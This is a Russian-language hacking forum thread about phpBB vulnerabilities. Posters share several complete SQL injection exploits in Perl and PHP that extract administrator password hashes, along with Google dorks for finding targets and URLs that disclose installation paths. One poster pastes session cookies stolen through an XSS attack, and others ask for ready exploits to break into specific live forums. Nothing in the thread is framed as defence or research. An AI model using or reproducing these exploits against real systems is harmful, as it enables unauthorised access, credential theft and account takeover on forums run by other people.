Уязвимости: phpBB

[comAT0Zz]

phpBB <=2.0.19Style Changer\Viewer MOD SQL injection sploit

#!/usr/bin/perl
#########################################################
#   _______ _______ ______  	#
#   |______ |______ |     \  #
#   ______| |______ |_____/  #
#                            #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT	#
#Created By SkOd                                        #
#SED security Team                                      #
#http://www.sed-team.be                                 #
#skod.uk@gmail.com                                      #
#ISRAEL                                                 #
#########################################################
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
#########################################################
use IO::Socket;
if (@ARGV < 3){
print q{
############################################################
#   phpBB Style Changer\Viewer MOD SQL injection Exploit   #
#  Tested on phpBB 2.0.19      #
#     created By SkOd. SED Security Team             #
############################################################
	bbstyle.pl [HOST] [PATH] [Target id]
  bbstyle.pl www.host.com /phpbb2/ 2
############################################################
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20FROM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";

[mod][Ŧ1LAN:] старенький сплоит.[/mod]

 

[seeattact]

Народ помогите.
вот оставил XSS на форуме phpBBB и пришли вот такие логи.
как опредилить от какого именно пользователя пришло это.
расскажите что по чём.

QUERY: phpbb2mysql_data=a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:5:"10580";}; PHPSESSID=af0163faf037babf0cea78ed70865588; phpbb2mysql_sid=a28feb6eb723a317ce7051b0e7923821; phpbb2mysql_t=a:15:{i:23168;i:1150973078;i:24172;i:1150973110;i:23776;i:1150973138;i:9401;i:1150973180;i:23989;i:1150973192;i:23984;i:1150973212;i:22894;i:1150973224;i:23523;i:1150973257;i:23260;i:1150973396;i:23809;i:1150973425;i:23882;i:1150973527;i:24408;i:1150973607;i:66;i:1150973624;i:17761;i:1150973740;i:2891;i:1150973834;}
REFERER: http://www.tis-dialog.ru/forum/viewtopic.php?t=2891
AGENT: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)

 

[b1t]

Здраствуйте.

Народ, подскажите пожалуйстя че за форум: http://forum.barev.net/
(т.е. версия PHPBB).
Я вроде переделовал эксплоит, для определения версии форума, но как то синтаксическая ошибка дает.. :bang:
Вот уже переделованный сплоит для http://forum.barev.net/

#!/usr/bin/perl
#                _    _        _             _                   
#   __ _  _ __  | |_ (_)  ___ | |__    __ _ | |_     _ __  _   _ 
#  / _` || '_ \ | __|| | / __|| '_ \  / _` || __|   | '__|| | | |
# | (_| || | | || |_ | || (__ | | | || (_| || |_  _ | |   | |_| |
#  \__,_||_| |_| \__||_| \___||_| |_| \__,_| \__|(_)|_|    \__,_|
#
# Coded by k1b0rg (768620)
# Script for determinantion of versions all phpbb forums
perl version.pl http://forum.barev.net/
use LWP::UserAgent;
print "------------------------------------------------------------------------\n";
print "               Determinant of versions phpbb forums                     \n";
print "                         Coded by ______                                \n";
print "              Antichat Security Team (antichat.ru)                      \n";
print "------------------------------------------------------------------------\n";
$link = $ARGV[0];
$browser = LWP::UserAgent->new;
$res = $browser->get($link.'/docs/CHANGELOG.html'); 
if($res->is_success)
{
@ver=$res->content=~/<title>phpBB (.*?) :: Changelog<\/title>/;
$version=$ver[0];
if($version=~/x/){
@ver=$res->content=~/<li><a href=\"(.*?)\">Changes since (.*?)<\/a><\/li>/i;
$ver[1]=~/(\d+)\.(\d+)\.(\d+)/;
$version=$1.'.'.$2.'.'.scalar $3+1;
print "\n".'version:'.$version if $version;
}else {
print "\n".'version:'.$version if $version; }
}else {
print "\n".'Can\'t define of version!'; }

Если есть ошибка, то исправьте, пожалуйста.
Или если увас есть другой реальный способ, то помогите пожалуйста :help:

 

[Se613]

Народ, подскажите пожалуйстя че за форум: http://forum.barev.net/
(т.е. версия PHPBB).

PhpBB 2.0.20

 

[b1t]

:sorry: Извините, а увас НЕ найдется способ проникновение админку?
Или похишению хэша.. я искал мнего (експлоита) , но единственный сплоит для этой версии Priv8 Exploit for PHPBB 2.0.20, который всего лишь закрывает админу доступ на 15 минут... типа МИНИ - DoS :excl:
Помогите пожалуйста :help:

 

[Ŧ1LAN]

плохо искал. смотри.

 

[b1t]

:sorry: Ну я же говорю, там только выдает про этого Admin/Restore Database remote сплоита, который на 15 минут админу НЕпускает в админку..
Ну это кого надо? мне нужен реальный способ получить хэши..
:help:

 

[not null]

Раскрытие установочного пути в phpBB all

phpBB2/privmsg.php?folder[]=
phpBB2/profile.php?mode[]=
phpBB2/posting.php?mode[]=
phpBB2/groupcp.php?mode[]=
phpBB2/modcp.php?mode[]=

Result: Warning: htmlspecialchars() expects parameter 1 to be string, array given in /www/phpbb2/posting.php

Добавлено в [time]1151855894[/time]
phpbb alltopics mod SQL injection exploit

#!/usr/bin/perl

print q{

           /      \
        \  \  ,,  /  /
         '-.`\()/`.-'
        .--_'(  )'_--.
       / /` /`""`\ `\ \           * SpiderZ ForumZ Security *
        |  |  ><  |  |
        \  \      /  /
            '.__.'       


=> Author: SpiderZ
=> Exploit: All Topics Hack Sql injection 
=> Per: phpBB ( 2.0.x - 2.0.21 )
=> Site: www.spiderz.altervista.org
=> Site02: www.spiderz.netsons.org
-----------------------------------------------------
Mod download: http://www.phpbbhacks.com/download/2821
-----------------------------------------------------
};

use IO::Socket;

print q{
=> Inserisci l'url
=> senza usare ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Indica la cartella
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid   = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path  = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%
20user_password%20FROM%20phpbb_users%20where%20user_id=".$user;
print "
=> Connessione in corso...\r\n";
$socket = IO::Socket::INET->new( 
Proto => "tcp", 
PeerAddr => "$server", 
PeerPort => "80") || die "Connessione fallita";
print "Connessione\r\n";
print "In corso...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "OK! Attacco Riuscito!\r\n\r\n";
while ($answer = <$socket>)
{
 if ($answer =~/(\w{32})/)
{
  if ($1 ne 0) {
   print "Password in md5: ".$1."\r\n";
      }
exit();
}
}

 

[Adolf]

phpBB 3 (memberlist.php) Remote SQL Injection Exploit

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";

/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/

if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host:      target server (ip/hostname)\n";
echo "path:      path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo "   -T[prefix]   specify a table prefix different from default (phpbb_)\n";
echo "   -p[port]:    specify a port other than 80\n";
echo "   -P[ip:port]: specify a proxy\n";
echo "   -u[number]:  specify a user id other than 2 (admin)\n";
echo "   -x:          disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}

error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
   $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
   }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
  $prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
  $user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
  $discl=1;
}
}

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}

$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
 $temp2=explode(" ",$temp[$i]);
 $cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}

$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???]\r\n";sleep(2);break;}
  }
  if ($i==255) {die("Exploit failed...");}
}
$j++;
}

$j=1;$admin="";
while (!strstr($admin,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
  $sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USERNAME,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
  echo "sql -> ".$sql."\n";
  $sql=urlencode(strtoupper($sql));
  $data="username=";
  $data.="&icq=";
  $data.="&email=";
  $data.="&aim=";
  $data.="&joined_select=lt";
  $data.="&joined=";
  $data.="&yahoo=";
  $data.="&active_select=lt";
  $data.="&active=";
  $data.="&msn=";
  $data.="&count_select=eq";
  $data.="&count=";
  $data.="&jabber=";
  $data.="&sk=c";
  $data.="&sd=a";
  $data.="&ip=".$sql;
  $data.="&search_group_id=0";
  $data.="&submit=Search";
  $packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
  $packet.="Content-Type: application/x-www-form-urlencoded\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: Close\r\n";
  $packet.="Cookie: ".$cookie." \r\n\r\n";
  $packet.=$data;
  sendpacketii($packet);
  if (!strstr($html,"No members found for this search criteria")) {$admin.=chr($i);echo "password -> ".$admin."[???]\r\n";sleep(2);break;}
  }
  if ($i==255) {die("Exploit failed...");}
$j++;
}
echo "--------------------------------------------------------------------\r\n";
echo "admin          -> ".$admin."\r\n";
echo "password (md5) -> ".$password."\r\n";
echo "--------------------------------------------------------------------\r\n";

function is_hash($hash)
{
 if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;}
 else {return false;}
}

if (is_hash($password)) {echo "Exploit succeeded...";}
else {echo "Exploit failed...";}
?>

пока не пробывал!

 

[Se613]

Adolf
А где копирайт?
[mod][not null:] Копирайт кого? Автора? Смотри сурс сплоита, там все написано. И не за чем разводить флейм[/mod]

 

[Adolf]

А тама где я брал их уже не было =). так что извиняй =(.

 

[not null]

Множественные XSS-уязвимости в phpBB 2.0.21
Уязвимости существуют из-за недостаточной фильтрации входящих от пользователя данных. Пользователь с правами администратора может внедрить произвольный код, который будет выполнен в браузерах пользователей форума.
Демонстрационное видео
Скачать|Download

 

[not null]

SQL-инъекция в All Topics Mod для phpBB

#!/usr/bin/perl

print q{
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                                    +
+ phpBB 2.0.21 (alltopics.php) SQL Injection Exploit +
+                                                    +
+                  bd0rk || SOH-Crew                 +
+                                                    +
+    Mod: http://www.phpbbhacks.com/download/2821    +
+                                                    +
++++++++++++++++++++++++++++++++++++++++++++++++++++++

};

use IO::Socket;

print q{
=> Insert URL
=> without ( http )
=> };
$server = <STDIN>;
chop ($server);
print q{
=> Insert directory
=> es: /forum/ - /phpBB2/
=> };
$dir = <STDIN>;
chop ($dir);
print q{
=> User ID
=> Number:
=> };
$user = <STDIN>;
chop ($user);
if (!$ARGV[2]) {
}
$myuser = $ARGV[3];
$mypass = $ARGV[4];
$myid = $ARGV[5];
$server =~ s/(http:\/\/)//eg;
$path = $dir;
$path .= "alltopics.php?mode=&order=ASC&start=-1%20UNION%20SELECT%20user_password%20FROM%20phpbb_ users%20where%20user_id=".$user;
print "
=> Exploit in process...\r\n";
$socket = IO::Socket::INET->new(
Proto => "tcp",
PeerAddr => "$server",
PeerPort => "80") || die "Exploit failed";
print "Exploit\r\n";
print "in process...\r\n";
print $socket "GET $path HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "Exploit finished!\r\n\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(\w{32})/)
{
if ($1 ne 0) {
print "MD5-Hash is: ".$1."\r\n";
}
exit();
}
}

Или Скачать|Download

 

[.to4ka]

ребят а есть для определения версии форума? как узнать мож кто подскажет..
есть такая штука http://forum.pyccxak.com/showthread.php?p=3274#post3274
но что-то молчит она-запрос идет а ответа ноль.

 

[qwe113]

----

 

[Rubi]

Ребята.. Определил версию форума 2.0.19.. :P
Нужен сплойтик.. :crazy:
+ как запустить? :crazy:

 

[b1t]

Ребята.. Определил версию форума 2.0.19..
Нужен сплойтик..
+ как запустить?

А как определял?? Подделись снами пожалуйста..
а эксплоит я видел в предыдуших страницах...

 

[n1†R0x]

А как определял?? Подделись снами пожалуйста..

Есть сплоит от Pyccxak, определяющий версию форума. но он определяет неточно. Есть отредактированный, определяет вроде как лучше, но не идеально (не тестил).

http://forum.pyccxak.com/showthread.php?p=3274#post3274

 

[[br]]

Лично я оперделяюю по чейнджлогу.. имхо на 9%% форум он не удален

http://site.ru/forum/docs/CHANGELOG.html

 

[.to4ka]

у меня эксплойтик определения ваще признаков не подавал
так все равно он тож по логу опрелеляет -))
---
ребят есть что-нибудь на 2.0.15?